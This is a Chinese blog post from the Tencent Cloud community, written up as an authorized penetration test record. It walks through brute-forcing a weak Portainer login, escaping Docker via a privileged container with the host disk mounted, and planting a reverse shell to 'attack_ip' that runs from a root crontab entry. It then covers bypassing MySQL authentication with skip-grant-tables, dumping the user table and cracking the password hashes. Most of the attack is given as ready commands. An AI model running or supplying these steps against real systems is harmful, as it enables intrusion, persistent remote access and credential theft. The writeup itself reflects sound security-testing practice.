前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >授权的一次测试记录

授权的一次测试记录

作者头像
Tommonkey
发布2023-03-20 11:20:03
4520
发布2023-03-20 11:20:03
举报
文章被收录于专栏:TommonkeyTommonkey

声明:本文中所测试的站点已获得授权进行渗透测试,任何模仿或借鉴本文思路或方法所造成的损失及引起的后果,请自行承担责任!!!

目标是某司及其旗下控股50%以上的子公司进行模拟真实的攻击行为。花了几天时间发现其正面实在是难有什么收获或者突破,而且他的安全设备给我的压力也是非常的大,所以俺果断转变的方向,直接开始对比较“偏僻”的资产进行信息收集与测试,对一些看上去是“主力”的资产我是直接忽略了。通过各种信息收集工具的搭配使用,在一个“偏僻的端口上”发现一个portainer服务,再加上他没有登录次数的限制与验证码,所以直接弱口令爆出了密码。

1-1
1-1

既然跟docker有关,想拿到shell的话,那必定是要用到docker逃逸方面的知识了。这里我随便拉去一个镜像并赋予特权模式让服务器磁盘挂在到拉去的镜像下,在通过crontab计划任务写入shell来达到目的

1-3
1-3

容器搭建好后启动运行,进入命令模式,查看当前是否是特权模式:

代码语言:javascript
复制
cat /proc/self/status | grep -qi "0000003fffffffff" && echo "Is privileged mode" || echo "Not privileged mode"
挂载磁盘
代码语言:javascript
复制
cd /
mkdir test
mount /dev/vda1 /test

写入反弹shell

首先新建一个反弹脚本:

代码语言:javascript
复制
echo "bash -i >& /dev/tcp/attack_ip/port 0>&1" > /test/etc/sysconfig/auto.sh

crontab写入计划任务

代码语言:javascript
复制
# 每两个小时运行一次反弹脚本
echo "* */2 * * * root sh /etc/sysconfig/auto.sh" >> /test/etc/crontab

(tips:crontab -l :查看计划任务列表)

1-6
1-6
1-7
1-7
连接数据库

反弹登录之后,发现是root权限,并在主目录下发现mysql初始化密码生成的隐藏文件.secret,但尝试登录后无果,应该是已经修改了密码,我们需要在/etc/my.cnf文件最后一行添加:skip-grant-tables ,来绕过mysql的登录。

代码语言:javascript
复制
echo "skip-grant-tables" >> /etc/my.cnf

同时因为是反弹shell,所以进入mysql后内容是无法反弹的,所以我们需要直接在mysql外面执行命令:如:mysql -se “show databases;”

1-8
1-8

新增一个拥有所有权限的新用户:

代码语言:javascript
复制
mysql -se "grant all on *.* to 'name'@'%' identified by 'password';"
mysql -se "FLUSH PRIVILEGES;"

但发现通过无密码登录是执行不了这种新增权限的命令的,无奈那就只能换方法咯! 直接查看mysql中存储用户信息的user表,密码是MD5加密的,我们需要去在线解一下密即可。

代码语言:javascript
复制
mysql -D mysql -se "select * from user;" 

成功显示出md5加密后的密码,接下来找一个在线md5解密一下即可,因为我这个密码比较复杂,还是申请使用了长亭无锋才md5解密成功~~~ 接下来navicat直接连接数据库。

1-9
1-9

TIPs

关于docker逃逸的其他姿势,可以学习一下这位师傅的博客总结:

代码语言:javascript
复制
https://wiki.teamssix.com/CloudNative/Docker/

OVER~

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-12-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • TIPs
  • OVER~
相关产品与服务
容器镜像服务
容器镜像服务(Tencent Container Registry,TCR)为您提供安全独享、高性能的容器镜像托管分发服务。您可同时在全球多个地域创建独享实例,以实现容器镜像的就近拉取,降低拉取时间,节约带宽成本。TCR 提供细颗粒度的权限管理及访问控制,保障您的数据安全。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档